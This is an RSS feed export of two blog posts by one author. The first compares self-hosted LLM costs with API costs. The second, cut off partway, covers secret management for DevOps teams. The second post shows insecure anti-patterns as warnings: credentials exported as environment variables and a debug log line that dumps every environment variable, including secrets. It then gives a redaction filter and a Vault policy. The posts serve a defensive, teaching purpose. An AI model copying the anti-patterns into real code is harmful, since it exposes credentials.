<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Yash Pritwani</title>
    <description>The latest articles on Forem by Yash Pritwani (@yash_pritwani_07a77613fd6).</description>
    <link>https://forem.com/yash_pritwani_07a77613fd6</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3885613%2F512bbd07-6ae3-485a-9e20-dd9e92758241.jpg</url>
      <title>Forem: Yash Pritwani</title>
      <link>https://forem.com/yash_pritwani_07a77613fd6</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/yash_pritwani_07a77613fd6"/>
    <language>en</language>
    <item>
      <title>Self-Hosted LLMs vs API: Real Cost Comparison at Production Scale</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Tue, 28 Apr 2026 06:01:17 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/self-hosted-llms-vs-api-real-cost-comparison-at-production-scale-33kl</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/self-hosted-llms-vs-api-real-cost-comparison-at-production-scale-33kl</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/self-hosted-llm-cost-comparison-production" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Self-Hosted LLMs vs API: Real Cost Comparison at Production Scale
&lt;/h1&gt;

&lt;p&gt;&lt;em&gt;The numbers nobody shares when pitching "just use the API" or "just self-host it."&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The $4,200/Month Wake-Up Call
&lt;/h2&gt;

&lt;p&gt;We ran OpenAI's GPT-4 API for 9 months straight. $4,200/month, predictable billing, zero operational overhead. The CFO loved it. The engineering team loved it. Everyone was happy.&lt;/p&gt;

&lt;p&gt;Then usage crossed 100,000 requests per day and the economics flipped overnight.&lt;/p&gt;

&lt;p&gt;This isn't a theoretical exercise. We're sharing the actual cost model we built when deciding whether to migrate inference workloads to self-hosted infrastructure — and the framework we now use for every AI infrastructure decision.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Cost Matrix: API vs Self-Hosted at Three Scales
&lt;/h2&gt;

&lt;h3&gt;
  
  
  At 10,000 Requests/Day
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cost Category&lt;/th&gt;
&lt;th&gt;OpenAI API&lt;/th&gt;
&lt;th&gt;Self-Hosted (Llama 3 70B)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Compute&lt;/td&gt;
&lt;td&gt;~$1,400/mo&lt;/td&gt;
&lt;td&gt;~$2,100/mo (A100 amortized)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ops/MLOps staff&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;td&gt;~$700/mo (fractional)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monitoring/infra&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;td&gt;~$200/mo&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$1,400/mo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$3,000/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Verdict: API wins by 2x.&lt;/strong&gt; At this scale, the operational burden of self-hosting destroys any compute savings. You need GPU procurement, model serving infrastructure (vLLM or TensorRT-LLM), monitoring, and someone who knows what they're doing. For a 10-person startup, this is a distraction.&lt;/p&gt;

&lt;h3&gt;
  
  
  At 100,000 Requests/Day
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cost Category&lt;/th&gt;
&lt;th&gt;OpenAI API&lt;/th&gt;
&lt;th&gt;Self-Hosted Cluster&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Compute&lt;/td&gt;
&lt;td&gt;~$14,000/mo&lt;/td&gt;
&lt;td&gt;~$4,800/mo (3x A100s)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ops/MLOps staff&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;td&gt;~$1,200/mo (dedicated)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Monitoring/serving&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;td&gt;~$400/mo&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$14,000/mo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$6,400/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Verdict: Self-hosted wins by 2.2x.&lt;/strong&gt; The break-even point sits around 55,000-65,000 requests/day depending on your model choice and token length. This is where the conversation gets interesting.&lt;/p&gt;
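
&lt;p&gt;A minimal sketch of that break-even arithmetic, assuming linear API pricing and a flat self-hosted monthly bill, using the illustrative dollar figures from the tables above:&lt;/p&gt;

```python
def api_monthly_cost(requests_per_day, cost_per_request):
    # API spend scales linearly with volume (30-day month)
    return requests_per_day * cost_per_request * 30

def break_even_requests_per_day(self_hosted_monthly, cost_per_request):
    # Volume at which linear API spend equals the flat self-hosted bill
    return self_hosted_monthly / (cost_per_request * 30)

# Per-request rate implied by the table above:
# roughly 14,000 dollars/month at 100,000 requests/day
COST_PER_REQUEST = 14_000 / (100_000 * 30)

threshold = break_even_requests_per_day(6_400, COST_PER_REQUEST)
print(f"break-even: {threshold:,.0f} requests/day")
```

&lt;p&gt;This flat model lands near 46,000 requests/day; the practical 55,000-65,000 range sits higher largely because real workloads add warm-standby capacity and long-context requests, both covered later in this article.&lt;/p&gt;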

&lt;h3&gt;
  
  
  At 1,000,000 Requests/Day
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cost Category&lt;/th&gt;
&lt;th&gt;OpenAI API&lt;/th&gt;
&lt;th&gt;Self-Hosted Fleet&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Compute&lt;/td&gt;
&lt;td&gt;~$140,000/mo&lt;/td&gt;
&lt;td&gt;~$22,000/mo (12x A100s)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MLOps team (2 FTEs)&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;td&gt;~$12,000/mo&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Infrastructure&lt;/td&gt;
&lt;td&gt;$0&lt;/td&gt;
&lt;td&gt;~$3,000/mo&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$140,000/mo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~$37,000/mo&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Verdict: Self-hosted wins by 3.8x.&lt;/strong&gt; At this scale, the API cost is existential. Companies like Zoho figured this out years ago — their entire AI stack runs on self-hosted infrastructure across their Chennai and Austin data centers.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the Spreadsheet Doesn't Capture
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Latency Control
&lt;/h3&gt;

&lt;p&gt;Our self-hosted p99 latency: 180ms, consistent. OpenAI API p99: anywhere from 200ms to 2,400ms depending on their load. For real-time applications — chatbots, code completion, search ranking — this variance kills user experience.&lt;/p&gt;

&lt;p&gt;One of our fintech clients in London had an SLA requirement of sub-300ms for their compliance checking pipeline. The API couldn't guarantee it. Self-hosted could.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Data Residency and GDPR
&lt;/h3&gt;

&lt;p&gt;For European clients, this is often the deciding factor before cost even enters the conversation. Running inference on EU-hosted servers with no data leaving the jurisdiction simplifies compliance dramatically.&lt;/p&gt;

&lt;p&gt;German companies especially care about this — Bundesamt für Sicherheit in der Informationstechnik (BSI) guidelines are strict. Indian companies building for European markets (think Freshworks, Razorpay) face the same calculus.&lt;/p&gt;

&lt;p&gt;With API providers, you need a Data Processing Agreement, legal review of their data retention policies, and ongoing compliance monitoring. Self-hosted? Your data never leaves your VPC.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Model Customization — The Real Unlock
&lt;/h3&gt;

&lt;p&gt;This is where self-hosting pays dividends that don't show up in cost comparisons. We fine-tuned Llama 3 on domain-specific data and saw a 12% improvement on our eval benchmarks compared to GPT-4 for our specific use case.&lt;/p&gt;

&lt;p&gt;The fine-tuning itself cost ~$800 in compute. The ongoing inference is cheaper because the fine-tuned 70B model outperforms GPT-4 for our domain, meaning fewer retry loops and shorter prompt chains.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Hidden Self-Hosting Costs Nobody Budgets For
&lt;/h3&gt;

&lt;p&gt;Here's where teams get burned:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MLOps talent&lt;/strong&gt;: €80,000-120,000/year in Germany, ₹25-40 lakh in India, $150,000-200,000 in the US. You need at least one person who understands GPU orchestration, model serving, and inference optimization.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPU procurement&lt;/strong&gt;: Still 8-12 weeks lead time for A100s. H100s are worse. Plan ahead or use cloud GPU providers as a bridge.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Model serving infrastructure&lt;/strong&gt;: vLLM, TensorRT-LLM, or NVIDIA Triton. Each has trade-offs. Expect 2-4 weeks of setup and tuning.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitoring&lt;/strong&gt;: Your existing Prometheus/Grafana stack needs GPU metrics, token throughput dashboards, and model quality monitoring. Budget 40-60 hours of engineering time.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Failover&lt;/strong&gt;: What happens when your GPU node dies at 3am? You need either redundancy or an API fallback — which means maintaining both stacks.&lt;/li&gt;
&lt;/ul&gt;
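
&lt;p&gt;Budgeting is easier when those line items live in one place. A toy aggregator follows; every dollar figure below is an illustrative placeholder, not a quote:&lt;/p&gt;

```python
def self_hosted_monthly_tco(gpu_amortized, mlops_staff, serving_infra,
                            monitoring, failover_reserve):
    # Total cost of ownership: the line items teams forget to budget
    items = {
        "gpu_amortized": gpu_amortized,       # hardware or cloud GPU spend
        "mlops_staff": mlops_staff,           # fractional or dedicated FTEs
        "serving_infra": serving_infra,       # vLLM / Triton hosts, storage
        "monitoring": monitoring,             # GPU metrics, quality dashboards
        "failover_reserve": failover_reserve, # warm standby or API fallback
    }
    return sum(items.values()), items

total, breakdown = self_hosted_monthly_tco(4_800, 1_200, 250, 150, 800)
print(f"total: ${total:,}/mo")
```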

&lt;h2&gt;
  
  
  The Framework We Use Now
&lt;/h2&gt;

&lt;p&gt;After running both approaches for over a year, here's our decision tree:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Under 50K requests/day → API always.&lt;/strong&gt; The operational simplicity isn't worth sacrificing. Spend your engineering time on product, not GPU orchestration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;50K-100K requests/day → Hybrid.&lt;/strong&gt; Route simple, high-volume tasks (classification, extraction, summarization) to self-hosted models. Keep complex reasoning tasks on GPT-4/Claude API. This is where most growing companies should be.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Over 100K requests/day → Self-hosted primary, API fallback.&lt;/strong&gt; Build the team, invest in the infrastructure, but always maintain API access for burst capacity and failover.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Data residency requirements → Self-hosted regardless of scale.&lt;/strong&gt; If your data cannot leave a specific jurisdiction, the cost comparison is secondary. Budget for it from day one.&lt;/p&gt;
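
&lt;p&gt;The decision tree above can be written as a tiny routing function; the thresholds and strategy names are simply the ones from this section:&lt;/p&gt;

```python
import bisect

# Volume thresholds (requests/day) and the strategy for each band
THRESHOLDS = [50_000, 100_000]
STRATEGIES = ["api", "hybrid", "self_hosted_primary_with_api_fallback"]

def choose_strategy(requests_per_day, data_residency_required=False):
    # Residency constraints override the cost comparison entirely
    if data_residency_required:
        return "self_hosted"
    band = bisect.bisect_right(THRESHOLDS, requests_per_day)
    return STRATEGIES[band]

print(choose_strategy(30_000))   # api
print(choose_strategy(75_000))   # hybrid
print(choose_strategy(250_000))  # self_hosted_primary_with_api_fallback
```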

&lt;h2&gt;
  
  
  The Singapore Factor
&lt;/h2&gt;

&lt;p&gt;For APAC companies routing through Singapore, there's an additional wrinkle: cloud GPU availability in the region is still limited compared to US/EU. AWS &lt;code&gt;ap-southeast-1&lt;/code&gt; has A100 instances but availability is spotty. Companies like Grab and Sea Group have been building their own GPU clusters for this reason.&lt;/p&gt;

&lt;p&gt;If you're an Indian startup serving Southeast Asian markets, consider colocation in Singapore with your own hardware. The upfront cost is higher, but the latency and availability improvements pay for themselves within 6 months at scale.&lt;/p&gt;

&lt;h2&gt;
  
  
  Mistakes We Made During Our Migration
&lt;/h2&gt;

&lt;p&gt;We want to be transparent about what went wrong, because these are the mistakes we see other teams repeat.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 1: Underestimating cold-start latency.&lt;/strong&gt; Our self-hosted Llama 3 70B model takes 45 seconds to load into GPU memory. When our primary node crashed at 2am and the failover kicked in, users experienced 45 seconds of downtime while the model loaded. API providers handle this transparently — you never see their cold starts. We fixed this by keeping a warm standby model loaded on a secondary node, but that doubled our GPU cost for the failover capacity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 2: Ignoring token-length variance.&lt;/strong&gt; Our cost model assumed average token usage. In reality, 15% of our requests were 4x longer than average (complex reasoning tasks with long context windows). These heavy requests consumed disproportionate GPU time and threw off our capacity planning. We now route by estimated token length: short requests to self-hosted, long-context requests to API.&lt;/p&gt;
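
&lt;p&gt;That capacity-planning miss is easy to reproduce. Assuming heavy requests consume 4x the GPU time of a typical light request, the effective load multiplier over a naive flat estimate is:&lt;/p&gt;

```python
def effective_load_multiplier(heavy_fraction, heavy_cost_ratio):
    # GPU-time multiplier versus planning on light requests alone
    light_fraction = 1.0 - heavy_fraction
    return light_fraction * 1.0 + heavy_fraction * heavy_cost_ratio

# 15% of requests consume 4x the GPU time of a typical request
m = effective_load_multiplier(0.15, 4.0)
print(f"provision {m:.2f}x the capacity a flat estimate predicts")
```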

&lt;p&gt;&lt;strong&gt;Mistake 3: Not accounting for model updates.&lt;/strong&gt; OpenAI ships model improvements continuously — you get better outputs for the same price without doing anything. Self-hosted models are frozen in time unless you actively retrain and deploy new versions. We budgeted $0 for ongoing model evaluation and retraining. The real cost is ~$2,000/quarter for fine-tuning updates plus 20 engineering hours for evaluation and deployment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 4: Building monitoring from scratch.&lt;/strong&gt; We spent 3 weeks building custom Grafana dashboards for GPU utilization, token throughput, and model quality metrics. We should have started with &lt;a href="https://docs.vllm.ai/" rel="noopener noreferrer"&gt;vLLM's built-in Prometheus metrics&lt;/a&gt; and only customized what we needed. The same monitoring principles we cover in our &lt;a href="https://www.techsaas.cloud/blog/cicd-pipeline-optimization-20min-to-3min" rel="noopener noreferrer"&gt;CI/CD pipeline optimization guide&lt;/a&gt; apply here — start with what exists, customize incrementally.&lt;/p&gt;

&lt;h2&gt;
  
  
  Frequently Asked Questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Q: Can I use cloud GPU providers (Lambda Labs, RunPod, CoreWeave) instead of buying hardware?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Yes, and we recommend this as the starting point. Cloud GPUs let you test self-hosting economics without the 8-12 week procurement cycle. The per-hour cost is higher than owned hardware, but the flexibility to scale up/down is worth it until you've validated your workload patterns. Once you're consistently running 80%+ utilization, owned hardware starts making sense.&lt;/p&gt;
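
&lt;p&gt;The 80% rule of thumb falls out of simple arithmetic: owned hardware is a fixed monthly cost, cloud GPUs are pay-per-hour. Both rates below are hypothetical placeholders, not quotes from any provider:&lt;/p&gt;

```python
def utilization_break_even(owned_monthly_all_in, cloud_hourly_rate,
                           hours_per_month=730):
    # Utilization at which cloud GPU spend matches the fixed cost of
    # owned hardware (amortization, power, colo, maintenance)
    return owned_monthly_all_in / (cloud_hourly_rate * hours_per_month)

# Hypothetical figures: $1,450/mo all-in owned vs $2.50/hr cloud A100
u = utilization_break_even(1_450, 2.50)
print(f"owned hardware wins above {u:.0%} utilization")
```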

&lt;p&gt;&lt;strong&gt;Q: What about smaller models? Do the economics change for 7B or 13B models?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Dramatically. A fine-tuned 7B model runs on a single A10G (~$0.75/hour on cloud), making self-hosting viable at much lower request volumes. We covered this in detail in a previous analysis of &lt;a href="https://www.techsaas.cloud/blog/self-hosted-llm-cost-comparison-production#smaller-models" rel="noopener noreferrer"&gt;fine-tuning economics for enterprise workloads&lt;/a&gt;. The break-even for 7B models can be as low as 10,000 requests/day.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Q: How does this compare to using open-weight models on cloud providers (e.g., Bedrock with Llama)?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Cloud-hosted open models (AWS Bedrock, GCP Vertex AI) sit between pure API and pure self-hosted. You get the operational simplicity of an API with some of the cost benefits of open models. The trade-off: you lose fine-tuning flexibility and data residency control. For regulated industries — fintech in the UK, healthcare in Germany — this may not satisfy compliance requirements. For everyone else, it's a legitimate middle ground.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Q: We're a 5-person startup. Should we even think about this?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No. Use the API. Spend every engineering hour on product. Come back to this article when your API bill crosses $5K/month. Seriously — premature optimization of AI infrastructure is one of the most common wastes of early-stage engineering time. We've written about this pattern in our &lt;a href="https://www.techsaas.cloud/blog/build-vs-buy-framework-engineering-leaders" rel="noopener noreferrer"&gt;build vs buy framework&lt;/a&gt; — the same principles apply to AI infrastructure decisions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Q: What about inference-as-a-service providers like Anyscale, Together AI, or Fireworks?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;These sit between pure API and pure self-hosted. You get open-model pricing (significantly cheaper than OpenAI) with managed infrastructure (no GPU ops). For teams between 50K-150K requests/day who don't want to hire MLOps talent, this is often the sweet spot. The trade-off: less control than self-hosted, more cost than doing it yourself at high scale, and you're still sending data to a third party. For regulated industries, this may not satisfy data residency requirements.&lt;/p&gt;

&lt;h2&gt;
  
  
  What We'd Do Differently
&lt;/h2&gt;

&lt;p&gt;If we started today:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Start with the API.&lt;/strong&gt; Always. Get your product-market fit first.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Track your API spend weekly.&lt;/strong&gt; Set alerts at $5K, $10K, $15K/month.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;When you hit $10K/month&lt;/strong&gt;, start the self-hosting evaluation. Not the migration — the evaluation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hire MLOps talent before you need them.&lt;/strong&gt; The 8-week GPU procurement window is nothing compared to the 12-week hiring cycle for good MLOps engineers.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Run hybrid for at least 3 months&lt;/strong&gt; before going fully self-hosted. You'll discover edge cases that only show up at scale.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Budget for ongoing model maintenance.&lt;/strong&gt; Fine-tuning isn't a one-time cost. Plan for quarterly retraining cycles and A/B testing infrastructure.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Related Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/multi-cloud-hidden-costs-pitfalls" rel="noopener noreferrer"&gt;Multi-Cloud Strategy Pitfalls&lt;/a&gt; — the same hidden cost analysis applied to cloud infrastructure decisions&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/build-vs-buy-framework-engineering-leaders" rel="noopener noreferrer"&gt;Build vs Buy Framework&lt;/a&gt; — the decision framework we use for all infrastructure investments, including AI&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/secret-management-best-practices-devops" rel="noopener noreferrer"&gt;Secret Management Best Practices&lt;/a&gt; — securing API keys and model credentials in production&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;The question was never "self-hosted or API." It was always "at what scale does the switch make financial sense for your specific workload?"&lt;/p&gt;

&lt;p&gt;We help engineering teams model this decision. If you're hitting $10K+/month in API costs and wondering whether it's time, let's talk.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.techsaas.cloud/services/" rel="noopener noreferrer"&gt;Get a free infrastructure audit →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Subscribe to our newsletter for weekly deep-dives into infrastructure decisions that save real money.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Stop Putting Credentials in Environment Variables: Secret Management for DevOps Teams</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Tue, 28 Apr 2026 06:00:44 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/stop-putting-credentials-in-environment-variables-secret-management-for-devops-teams-2pah</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/stop-putting-credentials-in-environment-variables-secret-management-for-devops-teams-2pah</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/secret-management-best-practices-devops" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  Stop Putting Credentials in Environment Variables
&lt;/h1&gt;

&lt;p&gt;&lt;em&gt;Environment variables aren't secret management. They're secret broadcasting. Here's what production teams actually use.&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Env Var Illusion
&lt;/h2&gt;

&lt;p&gt;Every "Getting Started" tutorial ends the same way:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;DATABASE_URL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;postgres://admin:supersecret@db:5432/prod
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;AWS_SECRET_ACCESS_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
docker-compose up
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It works. It's simple. And it's a ticking time bomb.&lt;/p&gt;

&lt;p&gt;Environment variables are visible to every process in the container. They show up in &lt;code&gt;docker inspect&lt;/code&gt;. They appear in crash dumps. They get logged by overeager monitoring tools. They persist in shell history. They get committed to &lt;code&gt;.env&lt;/code&gt; files that end up in git history.&lt;/p&gt;

&lt;p&gt;We run 84 containers in production. After a near-miss incident where a debug log accidentally captured an AWS key from &lt;code&gt;os.environ&lt;/code&gt;, we rebuilt our entire secrets pipeline. Here's the production-grade approach that replaced env vars — and the incident that convinced us.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Incident: 11 Seconds From Disaster
&lt;/h2&gt;

&lt;p&gt;A developer added debug logging to trace a connection timeout:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;logger&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;debug&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Connection config: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That log line captured every environment variable — including &lt;code&gt;AWS_SECRET_ACCESS_KEY&lt;/code&gt;, &lt;code&gt;DATABASE_URL&lt;/code&gt; with embedded credentials, and our Stripe API key. The logs shipped to our centralized logging stack (Loki), which is accessible to the entire engineering team.&lt;/p&gt;

&lt;p&gt;Our secret scanner (trufflehog running as a pre-commit hook + a post-deploy log scanner) caught it in 11 seconds. The alert fired, and our automated rotation script revoked the AWS key and issued a new one before any human saw the log entry.&lt;/p&gt;

&lt;p&gt;If we hadn't had that scanner? The credentials would have been sitting in Loki for anyone with dashboard access to find. And Loki retains logs for 30 days.&lt;/p&gt;

&lt;p&gt;This is the fundamental problem with env vars: &lt;strong&gt;they're ambient.&lt;/strong&gt; Any code running in the process can read them, and there's no audit trail of who accessed what.&lt;/p&gt;
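
&lt;p&gt;One cheap guardrail against this failure mode is a logging filter that scrubs known secret values before records ship. This is a sketch rather than our exact tooling, and it only mitigates the ambient-secret problem; the real fix is getting secrets out of the environment entirely:&lt;/p&gt;

```python
import logging
import os

# Names are illustrative; list whatever your services actually carry
SENSITIVE = ("AWS_SECRET_ACCESS_KEY", "DATABASE_URL", "STRIPE_API_KEY")

class RedactSecrets(logging.Filter):
    """Scrub known secret values out of log records before they ship."""
    def filter(self, record):
        msg = record.getMessage()
        for name in SENSITIVE:
            value = os.environ.get(name)
            if value:
                msg = msg.replace(value, f"[REDACTED:{name}]")
        # Replace the formatted message so downstream handlers see
        # only the redacted text
        record.msg, record.args = msg, None
        return True

logger = logging.getLogger("app")
logger.addFilter(RedactSecrets())
```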

&lt;h2&gt;
  
  
  The Secret Management Stack for Production
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Layer 1: HashiCorp Vault (or Your Cloud Provider's Equivalent)
&lt;/h3&gt;

&lt;p&gt;Vault is the source of truth for all secrets. Every credential lives in Vault. Nothing lives in env vars, &lt;code&gt;.env&lt;/code&gt; files, or Kubernetes secrets (which are merely base64-encoded and, by default, not encrypted at rest).&lt;/p&gt;

&lt;p&gt;Our setup:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Vault policy for the API service&lt;/span&gt;
&lt;span class="nx"&gt;path&lt;/span&gt; &lt;span class="s2"&gt;"secret/data/api/*"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;capabilities&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"read"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;path&lt;/span&gt; &lt;span class="s2"&gt;"secret/data/shared/database"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;capabilities&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"read"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# No access to other services' secrets&lt;/span&gt;
&lt;span class="nx"&gt;path&lt;/span&gt; &lt;span class="s2"&gt;"secret/data/billing/*"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;capabilities&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"deny"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



